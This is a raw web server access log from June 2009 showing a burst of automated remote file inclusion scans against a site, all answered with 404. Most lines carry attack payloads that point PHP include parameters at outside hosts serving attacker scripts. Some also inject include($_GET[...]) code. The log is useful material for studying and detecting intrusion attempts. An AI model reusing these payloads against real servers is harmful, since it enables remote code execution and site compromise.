209.172.33.230 - - [10/Jun/2009:00:19:42 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.raindrip.com/cms/media/baner.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
209.172.33.230 - - [10/Jun/2009:00:19:43 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.raindrip.com/cms/media/baner.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
209.172.33.230 - - [10/Jun/2009:00:19:48 -0400] "GET /logs/access_log.Q109010700//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.raindrip.com/cms/media/baner.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:20:03 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:20:03 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:20:03 -0400] "GET /logs/access_log.Q109052900///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:20:37 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:20:37 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:20:37 -0400] "GET /logs/access_log.Q109052900///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:20:48 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:20:48 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:20:48 -0400] "GET /logs/access_log.Q109052900///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:20:56 -0400] "GET /logs/access_log.Q108112300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.38.243.71 - - [10/Jun/2009:00:21:07 -0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:21:08 -0400] "GET /logs/access_log.Q108112300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
218.38.243.71 - - [10/Jun/2009:00:21:08 -0400] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.38.243.71 - - [10/Jun/2009:00:21:09 -0400] "GET /logs/access_log.Q109051600%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:21:15 -0400] "GET //atom.php5?page=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:21:15 -0400] "GET /logs//atom.php5?page=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:21:27 -0400] "GET /logs/access_log.Q109052300//atom.php5?page=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
113.29.225.7 - - [10/Jun/2009:00:21:35 -0400] "GET /logs/access_log.Q109050300%20%20/errors.php?error=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:00:22:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.239.76.25 - - [10/Jun/2009:00:22:29 -0400] "GET /logs/access_log.Q109052900%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.234.107.233 - - [10/Jun/2009:00:22:30 -0400] "GET /logs/access_log.Q109051600%20%20//viewbody.html?code=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
211.234.107.233 - - [10/Jun/2009:00:22:30 -0400] "GET /logs/access_log.Q109052100%20%20//viewbody.html?code=http://www.webdeoro.com/webdeoroimages//newswiremedia///fx29id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:22:43 -0400] "GET /logs/access_log.Q108112300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
77.221.130.17 - - [10/Jun/2009:00:22:44 -0400] "GET /logs/access_log.Q109051100/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://rsh.kiev.ua/dama/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:22:45 -0400] "GET /logs/access_log.Q109052900%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
74.6.22.170 - - [10/Jun/2009:00:22:46 -0400] "GET /images/_notes/circle_CD_coming.jpg.mno HTTP/1.0" 200 250 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.239.76.25 - - [10/Jun/2009:00:22:54 -0400] "GET /logs/access_log.Q108112300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:23:02 -0400] "GET /logs/access_log.Q109052900%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
222.239.76.25 - - [10/Jun/2009:00:23:08 -0400] "GET /logs/access_log.Q109052900%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://search.supersurge.com//config/id1.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.172.33.230 - - [10/Jun/2009:00:23:25 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.raindrip.com/cms/media/baner.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.38.243.71 - - [10/Jun/2009:00:23:27 -0400] "GET /logs/access_log.Q109052900%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
113.29.225.7 - - [10/Jun/2009:00:23:36 -0400] "GET /errors.php?error=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
113.29.225.7 - - [10/Jun/2009:00:23:36 -0400] "GET /logs/errors.php?error=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
113.29.225.7 - - [10/Jun/2009:00:23:36 -0400] "GET /logs/access_log.Q109052400%20%20/errors.php?error=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.172.33.230 - - [10/Jun/2009:00:23:44 -0400] "GET /logs/access_log.Q109010700%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.raindrip.com/cms/media/baner.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:23:45 -0400] "GET /logs/access_log.Q109052300%20%20//atom.php5?page=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.6.22.170 - - [10/Jun/2009:00:24:09 -0400] "GET /logs/access_log.Q108060400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.38.243.71 - - [10/Jun/2009:00:24:45 -0400] "GET /logs/access_log.Q109052400%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:25:22 -0400] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:25:22 -0400] "GET /logs/access_log.Q109052400%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:25:22 -0400] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:25:22 -0400] "GET /logs/access_log.Q109052100%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:00:27:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
113.29.225.7 - - [10/Jun/2009:00:27:39 -0400] "GET /logs/access_log.Q109050300%20%20/errors.php?error=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:27:49 -0400] "GET //agendax/addevent.inc.php?agendax_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:27:49 -0400] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:27:49 -0400] "GET /logs/access_log.Q109052300//agendax/addevent.inc.php?agendax_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
75.145.152.113 - - [10/Jun/2009:00:28:04 -0400] "GET /logs/access_log.Q109010700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://oursoultvxq.com/bbs/data/vip/id.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
75.145.152.113 - - [10/Jun/2009:00:28:04 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://oursoultvxq.com/bbs/data/vip/id.txt???? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
75.145.152.113 - - [10/Jun/2009:00:28:04 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://oursoultvxq.com/bbs/data/vip/id.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
190.144.44.36 - - [10/Jun/2009:00:29:16 -0400] "GET /logs/access_log.Q109052200//agendax/addevent.inc.php?agendax_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
75.145.152.113 - - [10/Jun/2009:00:30:56 -0400] "GET /logs/access_log.Q109051800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://oursoultvxq.com/bbs/data/vip/id.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
195.34.78.110 - - [10/Jun/2009:00:31:36 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.unreals.co.cc/id2.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:00:31:36 -0400] "GET /logs/access_log.Q109052800%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.unreals.co.cc/id2.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:00:31:36 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.unreals.co.cc/id2.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:00:31:39 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.unreals.co.cc/id2.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:00:31:39 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.unreals.co.cc/id2.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:00:31:39 -0400] "GET /logs/access_log.Q109052800%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.unreals.co.cc/id2.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:00:32:01 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.unreals.co.cc/id2.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:00:32:01 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.unreals.co.cc/id2.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:00:32:01 -0400] "GET /logs/access_log.Q109052800%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.unreals.co.cc/id2.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:00:32:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
76.19.113.180 - - [10/Jun/2009:00:32:37 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
76.19.113.180 - - [10/Jun/2009:00:32:37 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17"
222.122.141.76 - - [10/Jun/2009:00:32:49 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
222.122.141.76 - - [10/Jun/2009:00:32:49 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
222.122.141.76 - - [10/Jun/2009:00:32:51 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
222.122.141.76 - - [10/Jun/2009:00:32:54 -0400] "GET /logs/access_log.Q109060500//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.122.141.76 - - [10/Jun/2009:00:32:54 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
222.122.141.76 - - [10/Jun/2009:00:32:54 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
222.122.141.76 - - [10/Jun/2009:00:32:54 -0400] "GET /logs/access_log.Q109060500//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.122.141.76 - - [10/Jun/2009:00:32:56 -0400] "GET /logs/access_log.Q109060500//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.122.141.76 - - [10/Jun/2009:00:32:56 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
222.122.141.76 - - [10/Jun/2009:00:33:35 -0400] "GET /logs/access_log.Q109010700%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.122.141.76 - - [10/Jun/2009:00:33:38 -0400] "GET /logs/access_log.Q109010700%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.122.141.76 - - [10/Jun/2009:00:33:42 -0400] "GET /logs/access_log.Q109010700%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.122.141.76 - - [10/Jun/2009:00:33:51 -0400] "GET /logs/access_log.Q109060500%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.122.141.76 - - [10/Jun/2009:00:33:54 -0400] "GET /logs/access_log.Q109060500%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.122.141.76 - - [10/Jun/2009:00:33:57 -0400] "GET /logs/access_log.Q109060500%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://k4l0nk.jatimcrew.com/bat/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.231.1.113 - - [10/Jun/2009:00:34:00 -0400] "GET /include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
222.231.1.113 - - [10/Jun/2009:00:34:00 -0400] "GET /logs/access_log.Q109010700%20%20/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.231.1.113 - - [10/Jun/2009:00:34:00 -0400] "GET /logs/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
110.45.147.105 - - [10/Jun/2009:00:34:30 -0400] "GET /logs/error_log.Q109060300/errors.php?error=http://www.yorkza.com/fs/tq/it2.jpg??? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
110.45.147.105 - - [10/Jun/2009:00:34:30 -0400] "GET /errors.php?error=http://www.yorkza.com/fs/tq/it2.jpg??? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
110.45.147.105 - - [10/Jun/2009:00:34:31 -0400] "GET /logs/errors.php?error=http://www.yorkza.com/fs/tq/it2.jpg??? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
222.231.1.113 - - [10/Jun/2009:00:34:38 -0400] "GET /logs/access_log.Q109031800%20%20/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:00:35:09 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.unreals.co.cc/id2.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:35:11 -0400] "GET /logs/access_log.Q109052300%20%20//agendax/addevent.inc.php?agendax_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:00:35:15 -0400] "GET /logs/access_log.Q109052800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.unreals.co.cc/id2.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:00:35:17 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.unreals.co.cc/id2.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:00:35:23 -0400] "GET /logs/access_log.Q109052800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.unreals.co.cc/id2.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
190.144.44.36 - - [10/Jun/2009:00:35:23 -0400] "GET /logs/access_log.Q109052200%20%20//agendax/addevent.inc.php?agendax_path=http://www.freewebtown.com/fcorp/fx29id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
222.231.1.113 - - [10/Jun/2009:00:36:18 -0400] "GET /logs/access_log.Q109010700/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:00:36:20 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:00:36:20 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.106.67.146 - - [10/Jun/2009:00:36:21 -0400] "GET /logs/access_log.Q109010700/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.106.67.146 - - [10/Jun/2009:00:36:21 -0400] "GET /include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:00:36:24 -0400] "GET /logs/access_log.Q109053100//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:00:36:24 -0400] "GET /logs/access_log.Q109052200//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.106.67.146 - - [10/Jun/2009:00:36:26 -0400] "GET /logs/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
222.231.1.113 - - [10/Jun/2009:00:36:28 -0400] "GET /logs/access_log.Q109031800/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.106.67.146 - - [10/Jun/2009:00:36:37 -0400] "GET /include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
87.106.67.146 - - [10/Jun/2009:00:36:38 -0400] "GET /logs/access_log.Q109010700/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.106.67.146 - - [10/Jun/2009:00:36:39 -0400] "GET /logs/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:00:36:40 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:00:36:40 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:00:36:40 -0400] "GET /logs/access_log.Q109053100//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:00:36:46 -0400] "GET /logs/access_log.Q109052200//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://team-x.ucoz.com/scan/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.231.1.113 - - [10/Jun/2009:00:36:50 -0400] "GET /include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
222.231.1.113 - - [10/Jun/2009:00:36:50 -0400] "GET /logs/access_log.Q109010700%20%20/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.231.1.113 - - [10/Jun/2009:00:36:50 -0400] "GET /logs/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:00:37:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.231.1.113 - - [10/Jun/2009:00:37:14 -0400] "GET /logs/access_log.Q109031800%20%20/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
87.106.67.146 - - [10/Jun/2009:00:37:22 -0400] "GET /logs/access_log.Q109031800/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.231.1.113 - - [10/Jun/2009:00:37:22 -0400] "GET /logs/access_log.Q109052300/include.php?path[docroot]=http://dmpacking.com/bbs/data/main/mawar.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
